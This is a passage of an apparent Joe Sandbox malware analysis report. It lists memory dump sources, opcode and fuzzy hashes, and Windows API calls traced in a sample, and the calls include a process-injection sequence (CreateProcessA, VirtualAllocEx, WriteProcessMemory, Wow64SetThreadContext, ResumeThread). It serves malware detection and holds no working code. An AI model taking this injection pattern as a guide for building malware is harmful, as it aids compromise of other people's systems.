                                                                                                                                                                      • Opcode Fuzzy Hash: 39dcc30711f530faca070d57c606e12eca3c86ae3530cfb87c34f75c35819592
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B41B770E012099FDB08DFA9D8549EEFBF2AF88310F148469D419AB364DB359946CB91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6713f862c70d22845d8201529fbb925e329d650f8c4f7e7ce671838b57a3568e
                                                                                                                                                                      • Instruction ID: f6f3f1f9cdb802745e8e18aeb6128321ac10ab3572bc75098e368d7b9f8a7277
                                                                                                                                                                      • Opcode Fuzzy Hash: 6713f862c70d22845d8201529fbb925e329d650f8c4f7e7ce671838b57a3568e
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A41AFB5E016198FDB08CFEAD9846AEBBF2AF88300F14C06AD419AB354DB345946CF40
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 254574a333cffeb52ea0fa393659a7a175a012d8b8f6b8473c0a010359a3a9f8
                                                                                                                                                                      • Instruction ID: 25ba74e89c7e84b310c73ebc1fb811c89c5f7c5b018024e1199086afbb78d586
                                                                                                                                                                      • Opcode Fuzzy Hash: 254574a333cffeb52ea0fa393659a7a175a012d8b8f6b8473c0a010359a3a9f8
                                                                                                                                                                      • Instruction Fuzzy Hash: 8241B7B1E006198FEB58DFAAC94079EBBF3BF88300F14C1A9D559A7355EB300A859F51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d8ff49ae3c5e51b28b71ef48218105ed900f7d7465ec1f68d1b0c30eb1a5312d
                                                                                                                                                                      • Instruction ID: 3ff595aeefada1f2ee2cbab27670e5205affc0df424137169985ce9de7a24117
                                                                                                                                                                      • Opcode Fuzzy Hash: d8ff49ae3c5e51b28b71ef48218105ed900f7d7465ec1f68d1b0c30eb1a5312d
                                                                                                                                                                      • Instruction Fuzzy Hash: 9041A470E01209DFDB08DFA9D8949EEFBF2BF88310F148579E419A7364DB3599468B90
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8af06884f63d9d24d9f9a68e7b8a8d0cc618a72bae41de5ca3dd56fb4c634545
                                                                                                                                                                      • Instruction ID: 3993204e92030b6e7f58e0f5151a216993741e34f6c46fcda6c7ca9d1f4ae32f
                                                                                                                                                                      • Opcode Fuzzy Hash: 8af06884f63d9d24d9f9a68e7b8a8d0cc618a72bae41de5ca3dd56fb4c634545
                                                                                                                                                                      • Instruction Fuzzy Hash: BC31EAB0D14658DBEB18CFAAD8457DEBBF6BF8A300F04C569D809A7254DB740946CF81
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1735765744.000000000F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F030000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f030000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8202d9cb47aa2b96ee70f08ec04e631803ed20b0913c406ed5dd9b902045e708
                                                                                                                                                                      • Instruction ID: 81679c03af04239882d481f67689273a6813ad07a4a4ff9419df8ac89520377f
                                                                                                                                                                      • Opcode Fuzzy Hash: 8202d9cb47aa2b96ee70f08ec04e631803ed20b0913c406ed5dd9b902045e708
                                                                                                                                                                      • Instruction Fuzzy Hash: 80A00126CCF505D197500C6815A00F9D12D474F058A82B202841E32847822980044218

                                                                                                                                                                       Control-flow Graph (function 178d690-178d86d; graph image not reproduced): basic blocks call GetCurrentProcess, GetCurrentThread, GetCurrentThreadId and an internal subroutine at 178d873
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0178D71E
                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0178D75B
                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0178D798
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0178D7F1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                                                      • Opcode ID: 132eb8f1c7bdabed8aa1962511dfa80eef039b2f0a4febe1276fcd56e0842048
                                                                                                                                                                      • Instruction ID: 03f2a33e5cd08ff1f70c0fc9caa2e91c5db2dca5618ab4ce0d7a4f85cefd8ff2
                                                                                                                                                                      • Opcode Fuzzy Hash: 132eb8f1c7bdabed8aa1962511dfa80eef039b2f0a4febe1276fcd56e0842048
                                                                                                                                                                      • Instruction Fuzzy Hash: DC5144B0900349CFDB14EFA9D548B9EBFF1EF48314F248569E049A72A0DB74A884CF65

                                                                                                                                                                       Control-flow Graph (function 178d6a0-178d86d; graph image not reproduced): basic blocks call GetCurrentProcess, GetCurrentThread, GetCurrentThreadId and an internal subroutine at 178d873
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0178D71E
                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0178D75B
                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0178D798
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0178D7F1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                                                      • Opcode ID: 9865618190d6b758b6506083e9e5080a8ffd976c5caa758ce369ea320e2f669e
                                                                                                                                                                      • Instruction ID: b6ec99c23ec308474618bb55032b316c964c58e55cdbe9e9558d12712cae9832
                                                                                                                                                                      • Opcode Fuzzy Hash: 9865618190d6b758b6506083e9e5080a8ffd976c5caa758ce369ea320e2f669e
                                                                                                                                                                      • Instruction Fuzzy Hash: DE5133B0901349CFDB14EFA9D548BAEFFF1EB48314F208469E019A72A0DB749984CF65

                                                                                                                                                                       Control-flow Graph (function 7b5de44-7b5e195; graph image not reproduced): basic blocks call CreateProcessA
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B5E086
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: 2e43c99c7d58af630409dad588e0cfb54d5627d2aaf517c5ad94845320eb4d26
                                                                                                                                                                      • Instruction ID: 68c04880c8f972e800713349b87ea2e47118f8eb08a5c800bf53758e9e02170a
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e43c99c7d58af630409dad588e0cfb54d5627d2aaf517c5ad94845320eb4d26
                                                                                                                                                                      • Instruction Fuzzy Hash: 7EA13CB1D0031ADFEB20DFA8C8817DDBBB2EF44314F1485A9E849A7254DB749985CF92
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B5E086
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: dd406e1ad6ab16b7f384e1bcfc1a1d550f2407b5c6f839bde293c581a2090a23
                                                                                                                                                                      • Instruction ID: 9346ee2dee2cc55ae0ed8b80f9291c4261e4578d1b1bba390e681ee86bf75362
                                                                                                                                                                      • Opcode Fuzzy Hash: dd406e1ad6ab16b7f384e1bcfc1a1d550f2407b5c6f839bde293c581a2090a23
                                                                                                                                                                      • Instruction Fuzzy Hash: FA913BB1D0031ADFEB20DFA8C8817DDBBB2EF44314F1485A9E849A7254DB749985CF92
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0178B666
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 44c7d8875bb878c4772ad2c9efae1d11cf89c52ebc1817309110ba9eb1afa5f6
• Instruction ID: 0aed9ad616524ae86c3ab5aa0173a16a03eeb80c89bc439e2ba1baa73aaa25c3
• Opcode Fuzzy Hash: 44c7d8875bb878c4772ad2c9efae1d11cf89c52ebc1817309110ba9eb1afa5f6
• Instruction Fuzzy Hash: 60814470A00B058FD724EF29D44575ABBF1FF88300F108A2ED48AD7A54DB34E949CBA0
Memory Dump Source
• Source File: 00000000.00000002.1730192031.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5770000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 94b0180a39f2f7a33cab4c1c4a00f39b837d510beae558d56d1c5778bd9c30b3
• Instruction ID: 1ddea8892530ab60977de8f18a4c740848bec23db68f1b8b5c13c9d535c21d2b
• Opcode Fuzzy Hash: 94b0180a39f2f7a33cab4c1c4a00f39b837d510beae558d56d1c5778bd9c30b3
• Instruction Fuzzy Hash: 886113B1C04249AFCF02CFA9D984ADDBFB2BF49300F54815AE818AB221D7719945DF51
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05771FEA
Memory Dump Source
• Source File: 00000000.00000002.1730192031.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5770000_SecuriteInfo.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 4d11687860cfa77344b8b76b2cac3e1499f296201c9a4568bc767c0de061a852
• Instruction ID: 1a53d260cb2b75ea3f963d1d026e232c9a0970184d787a96e6f2f7d442ce89e2
• Opcode Fuzzy Hash: 4d11687860cfa77344b8b76b2cac3e1499f296201c9a4568bc767c0de061a852
• Instruction Fuzzy Hash: 1E51CEB5D003499FDF14CFA9D984ADEBFB5BF48300F24812AE419AB211D7749945CF91
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05771FEA
Memory Dump Source
• Source File: 00000000.00000002.1730192031.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5770000_SecuriteInfo.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 4937b09ab9f552f6d1fb98546d59e6d54452b3c513962228cdc0bbff569520c1
• Instruction ID: 7bbbdf622c93d34ae4089e8326d6903cd2f37577fec129e378c2c3d5977e8736
• Opcode Fuzzy Hash: 4937b09ab9f552f6d1fb98546d59e6d54452b3c513962228cdc0bbff569520c1
• Instruction Fuzzy Hash: 7D41AFB5D003099FDF14CF9AD984ADEBFB5BF48310F24812AE819AB210D7759945CF91
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 05774561
Memory Dump Source
• Source File: 00000000.00000002.1730192031.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5770000_SecuriteInfo.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 44878d3befea4abaded744d56f70fa0ec70d3bd6f77dd0eb6824e909f270559b
• Instruction ID: d1ec2a38fcab9eda00945f61ddf063cd9c0925a7dba79f78b376a42361ccd9fa
• Opcode Fuzzy Hash: 44878d3befea4abaded744d56f70fa0ec70d3bd6f77dd0eb6824e909f270559b
• Instruction Fuzzy Hash: 3D411DB5A00309CFCB14CF59D488AAABBF6FB88314F24C459D519AB321D774E941DFA0
APIs
• CreateActCtxA.KERNEL32(?), ref: 01786011
Memory Dump Source
• Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: b5f6be47e79acd86e1a061ff06722cbbfa1473316d0423a409372a2fd71c6702
• Instruction ID: c512df067d20342f2881f81090c81a67736a99da3d23d1da2afe2803770ba8e4
• Opcode Fuzzy Hash: b5f6be47e79acd86e1a061ff06722cbbfa1473316d0423a409372a2fd71c6702
• Instruction Fuzzy Hash: 6D41E2B0C00619DFDB24DFA9C844B9DFBF5BF48304F2480AAE408AB255DBB56946CF91
APIs
• CreateActCtxA.KERNEL32(?), ref: 01786011
Memory Dump Source
• Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 84249bc8cb93f609cc8f6b12ca26e0366a6b97de3058ab1d49dd7fc3fd147efc
• Instruction ID: 3989555b5185a28d9f4c85daa61516edfda9d4f6c2393b3724eb75c04302ae68
• Opcode Fuzzy Hash: 84249bc8cb93f609cc8f6b12ca26e0366a6b97de3058ab1d49dd7fc3fd147efc
• Instruction Fuzzy Hash: C14100B0C00619DEDB24DFA9C844B8DFBF5BF48304F2480AAE408AB255DBB56946CF91
Memory Dump Source
• Source File: 00000000.00000002.1733208660.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_93b0000_SecuriteInfo.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
• Opcode ID: b77dcf943c1b0713c76d95ad7b0a99ec4bdacf2a5187e1ff5e2c5082fe0c0738
• Instruction ID: 2d0a56db2c7a211bdf62b6fd452bc1947f036ab17e599db40a651ee1256ab22f
• Opcode Fuzzy Hash: b77dcf943c1b0713c76d95ad7b0a99ec4bdacf2a5187e1ff5e2c5082fe0c0738
• Instruction Fuzzy Hash: BC318B729053589FCB01CFA9D804AEEBFF8EF09310F14849AF654AB661C3359950DFA1
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B5D858
Memory Dump Source
• Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: e96ed1eb97dd9f58902c4d98eb539ea58898aee6ad3269f45746a2294abf6825
• Instruction ID: 87267fd6f58b2d5488607c365c0572154eda75e9389019a2fffff58f7040c157
• Opcode Fuzzy Hash: e96ed1eb97dd9f58902c4d98eb539ea58898aee6ad3269f45746a2294abf6825
• Instruction Fuzzy Hash: F82175B1D003499FDB10CFA9C985BDEBBF0FF48310F10882AE818A7240C7789A54CBA4
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B5D858
Memory Dump Source
• Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 2891555ec56bf19e5c075f7e25ac7f937d627e2961d79aa0f5b09e6d120128de
• Instruction ID: 4787f4797c918e03b92a6cfa7993a68710538ae7ba3cac518a066e400017f767
• Opcode Fuzzy Hash: 2891555ec56bf19e5c075f7e25ac7f937d627e2961d79aa0f5b09e6d120128de
• Instruction Fuzzy Hash: EB2139B1D003599FDB10DFA9C985BDEBBF5FF48310F108429E958A7250D7789944CBA4
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0178D96F
Memory Dump Source
• Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: eadc5d10995114efbe4b300a6047408f68f898bfb57e58722bf9ea2dff1bbd1c
• Instruction ID: afa76d369408dfb865e5b328bbff3535777cab435aea11134c532430bdb1d23a
• Opcode Fuzzy Hash: eadc5d10995114efbe4b300a6047408f68f898bfb57e58722bf9ea2dff1bbd1c
• Instruction Fuzzy Hash: AA2105B59002589FDB10CFA9D584ADEFFF5FB48320F14805AE958A7250D374A944CFA5
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B5D776
Memory Dump Source
• Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: b962903eb1d6b6499108cb12674e7460c1b7f9d3a6880a3d285a655508fd6b63
• Instruction ID: 19803343d086c0ac79afddd6a7baabd7d21c40808c6bbc4d5aa0ae7093a2e79d
• Opcode Fuzzy Hash: b962903eb1d6b6499108cb12674e7460c1b7f9d3a6880a3d285a655508fd6b63
• Instruction Fuzzy Hash: 682189B6D002098FDB10DF99C8447EEFBF5EF88320F24892AD568A7250C7359550DFA4
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B5DD38
Memory Dump Source
• Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
Similarity
• API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: 138f3713ae2ae1332986291b5ada805572ed48a7d16ce24bd16afc0953f7c1b7
                                                                                                                                                                      • Instruction ID: 39fd38b03edd41628810ba19f03621f222e046a46269375adc283f15d64ec488
                                                                                                                                                                      • Opcode Fuzzy Hash: 138f3713ae2ae1332986291b5ada805572ed48a7d16ce24bd16afc0953f7c1b7
                                                                                                                                                                      • Instruction Fuzzy Hash: D92136B19002599FDB10DFAAC881AEEFBF5FF48310F10842AE958A7250C7789544CBA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B5D6AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: bb64664d68692cc92b3318d02052df69925d779a6583492358356cbc1d5f6a1b
                                                                                                                                                                      • Instruction ID: 729a0fd011048f591b43fc381f62559fe837860d1645682d58c34ee1304d875a
                                                                                                                                                                      • Opcode Fuzzy Hash: bb64664d68692cc92b3318d02052df69925d779a6583492358356cbc1d5f6a1b
                                                                                                                                                                      • Instruction Fuzzy Hash: AF2138B1D002098FDB10DFAAC4857EEBBF4EF48324F108429D559A7240CB78A985CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B5DD38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: e48e10ba016ee276e298b308858d6f8b4a7c788b6f8f850cb7934bd6e446d851
                                                                                                                                                                      • Instruction ID: 0e5428cb14cc90e5b353128ddd2a0d6d15b7a045f4dbc44663706fe1b7ee996e
                                                                                                                                                                      • Opcode Fuzzy Hash: e48e10ba016ee276e298b308858d6f8b4a7c788b6f8f850cb7934bd6e446d851
                                                                                                                                                                      • Instruction Fuzzy Hash: 112128B1D002599FDB10DFAAC880BDEFBF5FF48310F108429E958A7250C7789544CBA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0178D96F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                      • Opcode ID: 3cdbd395b0b48e20c0975702466399a0aa5247f4161a7cc287db5bf58cccfbac
                                                                                                                                                                      • Instruction ID: 9baac489351e1fd56aa9237f34810aba7a6cb53eb9e8c0daad3ad564ef09c2d9
                                                                                                                                                                      • Opcode Fuzzy Hash: 3cdbd395b0b48e20c0975702466399a0aa5247f4161a7cc287db5bf58cccfbac
                                                                                                                                                                      • Instruction Fuzzy Hash: 2321E0B59002089FDB10CFAAD984ADEFBF9FB48320F14801AE958A3250D374A944CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B5D6AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 60e0c4613e390be58fc53217cbf13816265b88ffb503316c58825bace0321574
                                                                                                                                                                      • Instruction ID: 1bc74235ebd573eb493b81b9df35d01b5da62c40d77b963348967b040f7f4c74
                                                                                                                                                                      • Opcode Fuzzy Hash: 60e0c4613e390be58fc53217cbf13816265b88ffb503316c58825bace0321574
                                                                                                                                                                      • Instruction Fuzzy Hash: 462138B1D003098FDB10DFA9C5857EEBBF0EF48314F20842AD959A7240CB78A985CF95
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 93a0c9a922864f8e1b6f3fe6751244435cb2f233542996d011b0e44d8549d29a
                                                                                                                                                                      • Instruction ID: 3dd93d138065592d8df3c7115237c1809a59f5dcbf05078d7b621f9492d65880
                                                                                                                                                                      • Opcode Fuzzy Hash: 93a0c9a922864f8e1b6f3fe6751244435cb2f233542996d011b0e44d8549d29a
                                                                                                                                                                      • Instruction Fuzzy Hash: 012189B1D002498FDB14DFA9D5857EEFBF4EF88324F24849AC859A7250CB38A540CF95
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,093B8AB2,?,?,?,?,?), ref: 093B8B57
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1733208660.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_93b0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFromIconResource
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3668623891-0
                                                                                                                                                                      • Opcode ID: 436f3346564501ef9a3afa1a75c8188d7bf010b8250339017b8679556c66ba70
                                                                                                                                                                      • Instruction ID: 837320d6ebd49207c5fb297d76754ad3c5d03293ddb6c2999d158be83bd675fe
                                                                                                                                                                      • Opcode Fuzzy Hash: 436f3346564501ef9a3afa1a75c8188d7bf010b8250339017b8679556c66ba70
                                                                                                                                                                      • Instruction Fuzzy Hash: E41126B58002499FDB10DFAAD844BDEBFF8EB48320F14845AE554A7210C375A950DFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,093B8AB2,?,?,?,?,?), ref: 093B8B57
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1733208660.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_93b0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFromIconResource
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3668623891-0
                                                                                                                                                                      • Opcode ID: dda8cd611c70f3e5ac47d95265baca23450086dd672a55e7653a6722a4b42b81
